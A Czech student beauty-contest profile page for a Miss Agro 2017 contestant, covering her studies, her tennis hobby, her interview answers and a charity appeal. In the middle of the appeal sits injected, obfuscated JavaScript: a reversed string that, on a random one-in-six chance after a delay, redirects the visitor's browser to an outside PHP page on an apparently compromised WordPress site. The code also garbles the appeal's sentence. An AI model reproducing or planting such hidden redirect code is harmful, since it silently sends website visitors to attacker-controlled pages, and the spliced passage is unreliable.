Veronika Baďurová

Profil

Fotografie

Fakulta: PEF
Obor: Podnikání a administrativa (PAA)
Ročník: 1.
Věk:
21

Veronika je sportovec tělem i duší. Zajímá se o sport aktivně tak i pasivně třeba doma pěkně u televize. Sama, ale hraje závodně tenis už přes 11 let a je to její největší koníček, který ji také zabírá nejvíc času. Dále také ráda chodí do posilovny, do kina a taky jako každá holka si občas zajde na nákupy.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523000591{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2017?

Tuhle otázku nemám moc ráda, sama si na ni neumím úplně odpovědět. Snad oči, postava, ale i charakter a vůbec celá osobnost určuje kdo vyhraje Miss Agro. Není to jen o vzhledu což si někteří nesprávně myslí. Každý, kdo šel na casting Miss Agro, by se jí chtěl stát, proč by jinak na casting chodil?

Kdyby ses mohla narodit ještě jednou, kým bys chtěla být?

Když jsem tuhle otázku dostala poprvé odpověděla jsem, že bych chtěla být nějaký hezký chlápek, kterému u žen všechno projde, jen když se na ně hezky usměje. Osobně si pořád myslím, že chlapi to mají v životě obecně jednodušší než my ženy. Když ale tuhle otázku čtu podruhé, na svém životě bych nic neměnila. Mám milující rodinu, přítele a kamarády, kteří mě podporují v tom, co mám ráda. Mám v nich oporu vždycky když potřebuju. Dělám co mě baví a to je strašně důležité v životě.

Proč sis vybrala zrovna studium na ČZU a co máš na ní nejraději?

Studium na ČZU jsem si vybrala asi díky tomu, že na tuhle školu byly moc dobré ohlasy a recenze od mých známých a přátel. Hlavně na „Pefku“ a mě od střední školy baví ekonomika a finance. Nejraději na ČZU mám to, že je vše na jednom místě, nemusím jezdit nikam jinam a to mi vyhovuje.